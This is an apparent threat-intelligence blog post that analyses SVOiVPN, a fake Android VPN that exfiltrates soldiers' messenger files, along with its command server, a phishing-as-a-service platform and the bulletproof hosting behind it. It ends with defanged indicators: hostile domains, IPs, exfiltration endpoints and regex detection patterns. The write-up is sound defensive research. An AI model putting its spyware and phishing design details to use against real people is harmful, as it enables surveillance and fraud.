We downloaded a free VPN that is being handed to Russian soldiers, installed it on a test phone in a sealed, offline lab, and watched it work. It connected. It tunneled traffic. In every visible way it behaved like the privacy tool its tagline promised: "Бесплатный VPN-сервис для участников СВО," a free VPN service for participants of the "special military operation."

Then it reached into the phone's storage, copied the files sitting in the WhatsApp and Telegram folders, packed them into an archive, and uploaded them to a server its operator controls. The last thing it logged was a small green checkmark: "Archive uploaded ✅." Moments later that same server pushed a notification back to the phone, displaying text we had written and wired to open any web page we chose.

The app is called SVOiVPN. It is not a VPN. It is spyware, aimed at the soldiers of the army that is, at this moment, working to make sure they cannot communicate any other way.

This is the story of what it is, the criminal business it belongs to, and the bulletproof-hosting network it runs on. It is also, just as important, the story of the things we could not prove.

The lure

To understand why a fake VPN works as bait for Russian soldiers, you have to understand what Russia has done to their phones.

Across 2025 and into 2026, the Russian state made working, private communication simultaneously essential and illegal for its own people. It criminalized the advertising of VPNs and blocked roughly 460 of them; it fined users for merely searching banned content; it throttled Telegram and, by February 2026, cut off WhatsApp outright.123456 In their place it pushed MAX, a state "national messenger" that carries no end-to-end encryption, is wired into the FSB's surveillance plumbing, and, per a 2026 reverse-engineering analysis, can tell when a device is running a VPN.78 Then the irony that opened the door: Russian troops were reportedly ordered to stop using MAX at the front as too insecure for combat, a directive carried by the independent outlet Mediazona and by pro-war military channels, and denied by the Kremlin.9

Russian soldiers live on Telegram, for orders, for coordinates, for the daily mechanics of staying alive. Stripped of it, ordered off it, and told the official substitute was unsafe for combat, they were left to buy their own phones and source their own circumvention tools through unvetted channels. A "free VPN for SVO participants" dangles exactly the thing the state insists they need and forbids them from having. Russia's own censorship manufactured the demand this app exists to exploit.

How Russia manufactured the demand
timeline
    title Russia manufactures the demand · 2025 to 2026
    section Criminalize the alternatives
        Jul to Sep 2025 : VPN ads banned, searches fined (effective 1 Sep 2025)
                        : MAX state messenger made mandatory (1 Sep 2025)
        Jan 2026 : Roughly 460 VPNs blocked
    section Cut the messengers
        10 Feb 2026 : Telegram throttled
        12 Feb 2026 : WhatsApp blocked
    section The gap opens
        23 Feb 2026 : MAX reportedly called too insecure for the front (Kremlin denies)
        Then : A free "VPN for SVO participants" appears
          
Fig 1. The censorship sequence that created a captive, desperate market for circumvention tools among Russian frontline soldiers.

The app

The fake-VPN landing page in Russian flag colors, headed 'Бесплатный VPN-сервис для участников СВО' (a free VPN service for participants of the SVO), with green 'connected' VPN mockups on a tablet and phone and an Android download button
Fig 2. The lure. svoivpn[.]cfd presents itself as a free VPN service "for participants of the SVO," complete with a working-looking tunnel and an Android-only download. Captured 2026-05.

The lure lives at svoivpn[.]cfd, a landing page styled in Russian-flag colors, branded "СВОЙVpn" and tagged "Быстрый VPN" (Fast VPN). The name is a pun: СВОЙ reads both as СВО, the military operation, and as свой, one's own. The page offers an Android-only download. We pulled the APK (SVOiVPN.apk, package com.sdocument.app). VirusTotal returned 0 of 66 detections; the file had never been submitted before. Static analysis told us what it was built from:

Buried in the code was the address it phones home to: api[.]equinoxharbgrp[.]com, a domain dressed up as a Leicester, UK "financial calendar" company.

Following it home

The operator made a mistake. The command-and-control domain was Cloudflare-fronted, but an unauthenticated endpoint leaked the real server, 64.188.98[.]201, hosted at SERV.HOST GROUP in Frankfurt, and on that server the operator had left Apache directory listing enabled. The entire backend was exposed: at least eighteen PHP scripts across eight directories, including VPN management, a push-notification system, user management, file-exfiltration storage, an APK build pipeline, and debug tools.

An Apache open directory listing titled 'Index of /api' on the SVOiVPN command server, exposing folders and PHP scripts including files, push, vpn, logs.php, delete_by_ip.php and delete_logs_by_device.php
Fig 3. The OPSEC failure. An open Apache directory listing on the SVOiVPN C2 exposes the entire /api/ backend: the exfiltration store (files/), the push-tasking endpoint (push/), per-victim telemetry (logs.php), and anti-forensics scripts (delete_by_ip.php, delete_logs_by_device.php). Captured 2026-06-19.

One file decided the case. vpn_schema.sql, the database schema, showed that the app stores each client's WireGuard private key on the server. In a real VPN, that key never leaves the device; it is the whole basis of the tunnel's secrecy. Storing it server-side means the operator can decrypt everything the "VPN" carries. The tunnel is not protection; it is a wiretap by design. An admin panel, embedded inside the app itself through an Android WebView, completed the picture: a dashboard the operator manages from the same app the victims installed.

That told us where it phones home and what it can do. The next step was to watch it do it.

Detonation

Static analysis tells you what an app is built to do. To see what it does, you run it, carefully. We detonated the sample on a hardware-accelerated Android emulator inside a fully network-isolated environment, pointed not at the operator's live server but at a stand-in of our own, and seeded the test device with nothing but uniquely-marked decoy files. Nothing it sent could reach the operator; nothing it stole was real.

It behaved exactly as designed. On launch it swept the device's photos, downloads, and documents, and, pointedly, the files in the WhatsApp and Telegram media folders, packed them into a scraped_data archive, and uploaded it to /api/files/upload.php, reporting each step back to the panel: "Archive uploaded ✅." Every decoy we planted came back out the other side. The exfiltration the leaked schema had only implied was now something we had watched happen.

SVOiVPN exfiltration and push-redirect channel
flowchart LR
    P["Victim phone
SVOiVPN installed"] SCR["scrapeMessengerFiles
scrapePublicMedia
scrapeLocation*"] ZIP["scraped_data*.zip"] UP["POST /api/files/upload.php"] C2["C2 backend
SERV.HOST, Frankfurt"] POLL["GET /api/push/poll.php"] PR["PushResponse with actionUrl"] NOTE["High-priority notification
operator title and body"] TAP["Tap opens operator-chosen URL"] P --> SCR --> ZIP --> UP --> C2 C2 -. push tasking .-> POLL --> PR --> NOTE --> TAP classDef confirmed fill:#7a1d20,stroke:#C0272D,color:#fff; classDef channel fill:#5a4a12,stroke:#F5C542,color:#fff; class P,SCR,ZIP,UP,C2 confirmed; class POLL,PR,NOTE,TAP channel;
Fig 4. The exfiltration pipeline (crimson) was confirmed end-to-end in detonation: scrape, zip, upload to the C2. The push channel (gold) lets the operator send any phone a notification whose tap opens a chosen URL, a remote phishing weapon inside a "VPN." *The location scraper is present and was attempted at runtime, but the emulator returned no GPS fix, so we confirmed the intent, not a captured coordinate.

Then the detonation surfaced a capability the code had only hinted at. The push-notification endpoint, push/poll.php, is not the benign feature its name suggests. The server can return a list of "pushes," each carrying a title, a body, and, the important part, an actionUrl. For each one, the app raises a high-priority notification with the operator's text and wires the tap to open that URL directly. When we fed our stand-in server a crafted push, the test phone displayed it on cue: operator-chosen title, operator-chosen body, operator-chosen link.

That turns the spyware's notification system into a remote phishing weapon. The operator can push any infected phone a convincing, urgent message (a fake "security alert," an "expired subscription," a counterfeit government notice) and route the victim's tap anywhere: a credential-harvesting page, a malicious APK, a payment form. It runs from the server, needs no app update, and can be retargeted at will. A fake VPN that already reads a soldier's traffic and steals their files can also, on command, put an attacker-chosen page in front of them and dress it up as a system notification.

One honest limit

The app's location-scraping code is present, and at runtime it tries to collect GPS, but our emulator's location services would not feed it a fix, so we confirmed the intent and the attempt, not a captured coordinate. We say so rather than imply more.

The Android notification shade on the isolated test device showing a 'СВОй-VPN: Running in background' notification as the spyware persists
Fig 5. SVOiVPN running as a persistent background service on the isolated test device during detonation, the point at which it began sweeping the phone's storage. Captured 2026-06-20.

The business behind it

SVOiVPN is not a lone app. It is plugged into a criminal enterprise.

A second domain in the same infrastructure, withhatetoapi[.]cc, hosts a public documentation portal for a phishing-as-a-service platform that calls itself APEX RENT ("APEX API v1.1.4"). The docs describe a complete fraud toolkit: eighteen integrated email mailers, an SMS sender, two PDF-receipt generators, templates for a hundred consumer brands across twenty countries, a team-and-affiliate model with API keys, and a checker_balance flag that makes a phishing page ask a victim for their bank balance.

The APEX RENT documentation portal (docs.withhatetoapi.cc) open in the ANY.RUN interactive sandbox, branded 'APEX Docs / Документация / V1.1.4' and 'POWERED BY APEX RENT', with the sandbox flagging 'Malicious activity' and 'phishing'
Fig 6. The product. The public APEX RENT documentation portal (docs[.]withhatetoapi[.]cc), self-branded "APEX API v1.1.4" and "POWERED BY APEX RENT," fronts a phishing-as-a-service platform with eighteen mailers, a hundred brand templates, and a checker_balance flag. Here it renders inside the ANY.RUN interactive sandbox, which flags it as malicious phishing. Captured 2026-05.

In the taxonomy of phishing-as-a-service, that places APEX RENT in a specific lane, and we should be careful not to overstate it. There is no sign in the documentation of the real-time multi-factor interception that defines the premium tier, the platforms that hijack live login sessions. What APEX RENT competes on instead is breadth, the signature of high-volume consumer fraud, a close cousin of the Russian-language Telegram-bot scam factories that Group-IB tracks as Classiscam and ESET as Telekopye.1011 What is notable is less the technique than the packaging: a versioned REST API, affiliate keys, a documentation portal. The scam economy now ships its product the way a software startup would. APEX RENT is phishing with a product roadmap.

How does the fake VPN connect to it? Through shared bulletproof hosting and a handful of converging tells. svoivpn[.]cfd sits on the same server as a roughly 116-domain Telegram-phishing cluster; the APEX Telegram channels openly market the host that carries all of it; the spyware's command server and the phishing platform share a small, distinctive code convention (the same log_type field). Together that is enough to place SVOiVPN and APEX RENT inside the same operation with reasonable confidence. It is not enough to prove a single individual runs both: the connective tissue is a shared landlord, and a bulletproof host serves many tenants. We return to that gap below.

Fig 7. The ecosystem. The SVOiVPN spyware and its C2 (red), the Shinomiya bulletproof origin and the Telegram-phishing cluster (gold), the APEX RENT platform (blue), and the sanctioned bulletproof neighborhood (purple). Solid edges are observed or high-confidence; dashed edges are medium-confidence inferences; the dotted red edge marks the one link we could not confirm: whether the bulk "Cluster A" domains belong to APEX RENT at all. Scroll to zoom, drag to pan, hover for detail.
The thread we could not close

For the record: the thread we first pulled, a templated batch of phishing domains we call Cluster A, turned out to be the loosest one. We could not confirm those bulk domains belong to APEX RENT at all; the only observed redirect into the platform came from a single, separate brand-verification domain. The investigation's spine is the spyware, not the domains we started from, and we leave that link open rather than collapse it into a tidier story.

The operator and the neighborhood

The trail to the operator runs not through the C2 but through the distribution site. svoivpn[.]cfd resolves to its own origin, 87.120.107[.]209, a different server and network from the SERV.HOST box behind the C2, and that IP belongs to an autonomous system, AS215428, operating as Shinomiya Hosting: a bulletproof-hosting reseller (formerly "SapDedic") that markets dedicated servers in Finland and Germany and advertises on Lolz.live, one of the largest Russian-language criminal forums. Its public RIPE registration names a Ukrainian national, Mykyta Skorobohatko, in Shostka, Sumska Oblast, near the Russian border.

Here precision matters, and we keep it. That Skorobohatko is the registrant of the hosting is an observation, drawn from a public record. That the same person operates APEX RENT and SVOiVPN, rather than merely renting out the bulletproof hosting they run on, is an inference, supported by the convergence of services but not independently confirmed; the registration itself could be genuine, co-opted, or fabricated.

The network the registrant runs sits in bad company. The Qurium Media Foundation's investigation into the Doppelganger Russian disinformation operation names AS215428 directly,12 alongside the autonomous systems of a bulletproof-hosting constellation (Netshield, DpkgSoft, SERV.HOST) that fans out from Aeza, a Russian bulletproof host the U.S. Treasury sanctioned in July 2025,13 and from Stark Industries, sanctioned by the EU weeks earlier.141516 This is the sharpest version of a careful caveat: the operator's own network materially hosts Russian state-aligned operations, but as a landlord, not, on the evidence, as an author. The connection to sanctioned infrastructure is infrastructural, not operational. What it does establish is that the neighborhood the soldiers' data flows into is itself a target of coordinated Western sanctions.

The stakes

In this war, the data this app steals is not an abstract privacy harm. A frontline soldier's geolocation and the documents in their Telegram are fire-mission inputs. Russia's own Ministry of Defense, after a HIMARS strike killed scores of newly mobilized troops at Makiivka on New Year's Day 2023, blamed the dead soldiers' mass use of mobile phones for giving away their position.17 A RUSI analysis traced the November 2023 strike on Ukraine's 128th Mountain Assault Brigade to the compromise of a single soldier's Signal account.18 Both armies now treat a soldier's phone signal as a lethal liability, and both have restricted frontline phone use because of it.

It is worth being clear that SVOiVPN's targeting is not, in fact, unusual. It drops into a documented 2025–2026 pattern of Android spyware aimed at Russian soldiers: the trojanized Alpine Quest mapping app (Doctor Web, April 2025),19 and the romance-lure SiribClone campaign and its SafeLoveStealer implant (The Record, June 2026),20 both of which, like ours, harvest soldiers' messenger data and geolocation, and both of which remain unattributed.

That word is the one to sit with. Every comparable campaign against Ukrainian soldiers (Sandworm's Infamous Chisel, the GRU's Signal-device-linking, the fake artillery and army apps) has been firmly pinned on Russian military intelligence by government and vendor reporting.21222324 The campaigns against Russian soldiers, this one included, have been attributed to no one, though it is worth noting that the two precedents above were documented by Russian security vendors, who are unlikely to name their own state. The asymmetry of public attribution is real even so. Symmetry of tactics is not symmetry of proof, and we resist the temptation to supply the missing attribution.

"Symmetry of tactics is not symmetry of proof. We can show you the machine, who it is aimed at, and what one tap costs. We will not invent the sponsor the evidence does not name."

What we proved, and what we didn't

We ran the question of who is behind this through a formal Analysis of Competing Hypotheses, now spanning thirty-two pieces of evidence across four scenarios. The leading explanation (a Russian-speaking, Ukrainian-registrant cybercriminal and bulletproof-hosting reseller, operating for profit in the mold of the Classiscam scam economy) carries zero inconsistencies; the runtime behavior we confirmed, indiscriminate bulk theft plus a built-in fraud-and-redirect channel, is the shape of profit-driven crime, not the selective collection of an intelligence service. We put our confidence at roughly 70 to 80 percent. What keeps it short of certainty is the one thing infrastructure analysis cannot settle: whether this individual operates the spyware or merely resells the hosting it runs on, and whether the soldier-targeting carries any motive beyond money.

Fig 8. The honest connection-strength matrix. Each link is graded Observation, Inference (high), Inference (medium), or Open. The spyware-to-C2 chain is observed; the operator's identity and the Cluster A–to–APEX RENT link are the weakest joints, and we grade them as such.

We are also careful about novelty, because it is easy to overclaim. We are not the first to see this infrastructure: withhatetoapi[.]cc had been scanned roughly a hundred times and flagged as a possible threat in automated feeds since February 2026, months before we looked. What we did not find is any published analysis that identifies it as a phishing-as-a-service platform, names it "APEX RENT," or connects it to SVOiVPN; and the spyware's command server, by contrast, had never been scanned at all. Our contribution is the identification and the linkage, not the discovery of a domain.

The withhatetoapi.cc platform domain rendered in the ANY.RUN sandbox, now showing a Cloudflare 'Warning: Suspected Phishing' interstitial stating the website has been reported for potential phishing
Fig 9. Flagged, not hidden. By 2026-06-21, withhatetoapi[.]cc sits behind a Cloudflare "Suspected Phishing" interstitial: the platform was visible to automated detection long before we named it. Captured 2026-06-21 (ANY.RUN).

And we cannot tell you how many soldiers installed it. Only its operator can: the victim count lives in the very database we chose not to mine. The signals we can see point to a small, low-profile operation, not a mass campaign: a marketing footprint of a few hundred subscribers, a sample no one else had submitted, infrastructure that flew under the radar. The story's weight is not in a headcount. It is that a working spyware machine is aimed at frontline soldiers, where even a handful of compromised phones is a lethal liability, and we can show you the machine, who it is aimed at, and what one tap costs.

We believe that intellectual honesty about what remains unconfirmed makes the confirmed findings stronger, not weaker.

Detection and indicators

All indicators are defanged. Treat the domains and IPs below as hostile, and do not transact with the named sanctioned hosts.

Infrastructure
Fake-VPN distributionsvoivpn[.]cfd
APEX RENT platformwithhatetoapi[.]cc · TDS traffic[.]withhatetoapi[.]cc (403s non-browsers) · docs docs[.]withhatetoapi[.]cc
SVOiVPN C2equinoxharbgrp[.]com (api. / panel.)
Shinomiya origin87.120.107[.]209 · AS215428 · Finland
C2 origin64.188.98[.]201 · SERV.HOST GROUP · AS207957 · Frankfurt
SVOiVPN malware
SHA-25629b42cf018b81e6d09b886ecfa97093680776257ec132ce89aff4b7a81ff77d7
Packagecom.sdocument.app
Signerfa0f2a2dcf974b428842c28f05e91d4641fde50e (Android Debug cert)
VirusTotal0 / 67 (undetected as of 2026-06-20)
SVOiVPN C2 endpoints
Exfiltration/api/files/upload.php (multipart scraped_data*.zip)
Telemetry/api/logs.php (per-victim, carries log_type)
Push / redirect/api/push/poll.php (actionUrl tasking)
Cluster A domain patterns (attribution to APEX RENT is OPEN)
Fingerprint .icu^[a-z]{2}\d{2,3}-\d{2,3}\.icu$
Secure-* .icu / .com^secure-[a-z]\d{3,4}\.(icu|com)$
CaveatThe secure-* pattern is also used by unrelated actors; verify registrar and registration timing before acting.
Telegram
APEX RENT@Apex2Rent · @apexhelper · @apexmailerinfo · @ApexDomainBot · @ApexHost_Bot
SVOiVPN / hosting@svojvpn · @svojvpn_bot · @shinomiya_com · @shinomiya_robot · @shinomiya_sup

Methodology

This investigation ran in two phases.

Passive collection and attribution. The infrastructure was mapped entirely from passive and public sources: passive DNS, certificate transparency, ICANN zone files, RDAP/WHOIS, a Shodan survey, static APK decompilation, and third-party sandbox analysis (Joe Sandbox and ANY.RUN), corroborated by external reporting (DecodeCybercrime, Qurium, Krebs on Security) and U.S. Treasury and EU sanctions records. Every C2 detail described above was read from unauthenticated endpoints the operator left publicly exposed; no credentials were bypassed or exploited. Attribution follows the ICD 203 estimative-language standard and a formal Analysis of Competing Hypotheses, with each claim graded by confidence and unconfirmed links labeled as such.

Controlled active analysis. To move key findings from present in the code to observed in behavior, we then conducted two live analyses under strict containment, shielding the origin of our own activity. We rendered the cloaked pages in an anonymized, origin-shielded browser. And we executed the spyware on a hardware-accelerated Android emulator in a fully network-isolated environment (no route to the internet and no path to the operator's servers) with its outbound traffic terminated by a stand-in server under our control, the test device seeded only with uniquely-marked decoy files. The live sample was never run anywhere it could reach the operator, and no real data ever left our control. Where a capability could not be exercised in testing, notably GPS-location collection, we say so rather than imply confirmation.

Sources

  1. Meduza. "No more phone-sharing, VPN ads, or foreign-agent teachers," September 1, 2025. meduza.io.
  2. Meduza. "Putin signs law penalizing online searches for content deemed extremist," July 31, 2025. meduza.io.
  3. Human Rights Watch. "Russia Clamps Down on Online Searches," July 24, 2025. hrw.org.
  4. Izvestia. "Roskomnadzor blocked more than 400 VPN services in 2025," January 22, 2026. iz.ru.
  5. The Moscow Times. "Roskomnadzor tightens restrictions on Telegram as users report disruptions," February 10, 2026. themoscowtimes.com.
  6. CNN Business. "Russia blocks WhatsApp," February 12, 2026. cnn.com.
  7. The Moscow Times. "Everything you need to know about MAX, Russia's state-backed answer to WhatsApp," August 28, 2025. themoscowtimes.com.
  8. TechRadar. "Russia's state-backed MAX app may know if you are using a VPN" (2026 reverse-engineering analysis; corroborated by RKS Global; MAX denied). techradar.com.
  9. Meduza. "The Kremlin spent years building a messenger to replace Telegram. Now it's reportedly telling soldiers the substitute is too insecure to use at the front," February 23, 2026 (sourced to Mediazona and pro-war military channels; denied by the Kremlin). meduza.io.
  10. Group-IB. "Inside Classiscam," March 1, 2021. group-ib.com.
  11. ESET WeLiveSecurity. "Telekopye: Hunting Mammoths using a Telegram bot," August 24, 2023. welivesecurity.com.
  12. Qurium Media Foundation. "Exposing the evil empire of Doppelganger disinformation" (names AS215428 / MYKYTASKOROB), July 2024. qurium.org.
  13. U.S. Department of the Treasury / OFAC. Press release sb0185, "Treasury Sanctions Bulletproof Hosting Service Aeza Group," July 1, 2025. home.treasury.gov.
  14. Council of the EU. "Russian hybrid threats: EU lists further 21 individuals and 6 entities" (Stark Industries), May 20, 2025. consilium.europa.eu.
  15. KrebsOnSecurity. "Stark Industries Solutions: An Iron Hammer in the Cloud," May 23, 2024. krebsonsecurity.com.
  16. KrebsOnSecurity. "Bulletproof Host Stark Industries Evades EU Sanctions," September 11, 2025. krebsonsecurity.com.
  17. Al Jazeera. "Russia now says 89 killed in Ukraine attack, blames mobile phones," January 4, 2023. aljazeera.com.
  18. RUSI (Dan Black). "Russia's Cyber Campaign Shifts to Ukraine's Frontlines," July 22, 2024. rusi.org.
  19. Doctor Web. "Android.Spy.1292.origin" (trojanized Alpine Quest targeting Russian military), April 23, 2025. news.drweb.com.
  20. The Record. "Hackers pose as women seeking romance to target Russian military" (SiribClone / SafeLoveStealer), June 9, 2026. therecord.media.
  21. CISA. Malware Analysis Report AR23-243a, "Infamous Chisel," August 31, 2023. cisa.gov.
  22. NCSC-UK. "UK and allies support Ukraine, calling out Russia GRU malware campaign," August 31, 2023. ncsc.gov.uk.
  23. Google Threat Intelligence Group. "Signals of Trouble: Russia targeting Signal Messenger," February 20, 2025. cloud.google.com.
  24. CrowdStrike. "Danger Close: Fancy Bear Tracking of Ukrainian Field Artillery Units," December 2016. crowdstrike.com.
infrastructure bulletproof-hosting phishing-as-a-service android-spyware threat-intelligence sanctions-evasion OSINT malware-analysis

CrimsonVector, investigative research by Diego Parra into criminal infrastructure, threat-actor attribution, and security research. Defanged URLs and IPs are intentionally bracketed per responsible disclosure conventions.